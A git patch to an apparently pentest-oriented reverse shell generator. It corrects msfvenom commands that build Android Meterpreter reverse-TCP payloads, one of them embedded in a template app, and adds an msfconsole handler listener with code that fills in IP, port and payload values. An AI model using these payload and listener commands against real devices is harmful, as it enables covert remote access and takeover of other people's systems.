From fe8ffde2996f6615e2196eb49cdaa540bdc224eb Mon Sep 17 00:00:00 2001
From: epi <epibar052@gmail.com>
Date: Sun, 4 Apr 2021 14:37:06 -0500
Subject: [PATCH] added msfconsole listeners; minor bugfixes for msf payloads

---
 js/data.js   |  7 ++++---
 js/script.js | 18 ++++++++++++++++++
 2 files changed, 22 insertions(+), 3 deletions(-)

diff --git a/js/data.js b/js/data.js
index 60e4cd1..a0d7bca 100644
--- a/js/data.js
+++ b/js/data.js
@@ -327,12 +327,12 @@ const msfvenomCommands =  withCommandType(
         },
         {
             "name": "Android Meterpreter Reverse TCP",
-            "command": "msfvenom -a x64 --platform android –p android/meterpreter/reverse_tcp lhost={ip} lport={port} R -o malicious.apk",
+            "command": "msfvenom -a x64 --platform android -p android/meterpreter/reverse_tcp lhost={ip} lport={port} R -o malicious.apk",
             "meta": ["msfvenom", "android", "android", "reverse"]
         },
         {
             "name": "Android Meterpreter Embed Reverse TCP",
-            "command": "msfvenom -a x64 --platform android -x <app.apk> android/meterpreter/reverse_tcp lhost={ip} lport={port} -o payload.apk",
+            "command": "msfvenom -a x64 --platform android -x template-app.apk -p android/meterpreter/reverse_tcp lhost={ip} lport={port} -o payload.apk",
             "meta": ["msfvenom", "android", "android", "reverse"]
         },
         {
@@ -357,7 +357,8 @@ const rsgData = {
         ['windows ConPty', 'stty raw -echo; (stty size; cat) | nc -lvnp {port}'],
         ['socat', 'socat -d -d TCP-LISTEN:{port} STDOUT'],
         ['socat (TTY)', 'socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{port}'],
-        ['powercat', 'powercat -l -p {port}']
+        ['powercat', 'powercat -l -p {port}'],
+        ['msfconsole', 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"']
     ],
 
     shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh'],
diff --git a/js/script.js b/js/script.js
index 23ae4f1..63a226f 100644
--- a/js/script.js
+++ b/js/script.js
@@ -80,6 +80,7 @@
         const rsg = {
             ip: localStorage.getItem('ip') || '10.10.10.10',
             port: localStorage.getItem('port') || 9001,
+            payload: localStorage.getItem('payload') || 'windows/x64/meterpreter/reverse_tcp',
             shell: localStorage.getItem('shell') || rsgData.shells[0],
             listener: localStorage.getItem('listener') || rsgData.listenerCommands[0][1],
             encoding: localStorage.getItem('encoding') || 'None',
@@ -137,6 +138,21 @@
                 return reverseShellData.command;
             },
 
+            getPayload: () => {
+                if (rsg.commandType === 'MSFVenom') {
+                    let cmd = rsg.getReverseShellCommand();
+                    // msfvenom -p windows/x64/meterpreter_reverse_tcp ...
+                    let regex = /\s+-p\s+(?<payload>[a-zA-Z0-9/_]+)/;
+                    let match = regex.exec(cmd);
+                    if (match) {
+                        return match.groups.payload;
+                    }
+                }
+
+                return 'windows/x64/meterpreter/reverse_tcp'
+
+            },
+
             generateReverseShellCommand: () => {
                 let command
 
@@ -306,6 +322,8 @@
                 let command = listenerSelect.value;
                 command = rsg.highlightParameters(command)
                 command = command.replace('{port}', rsg.getPort())
+                command = command.replace('{ip}', rsg.getIP())
+                command = command.replace('{payload}', rsg.getPayload())
 
                 if (rsg.getPort() < 1024) {
                     privilegeWarning.style.visibility = "visible";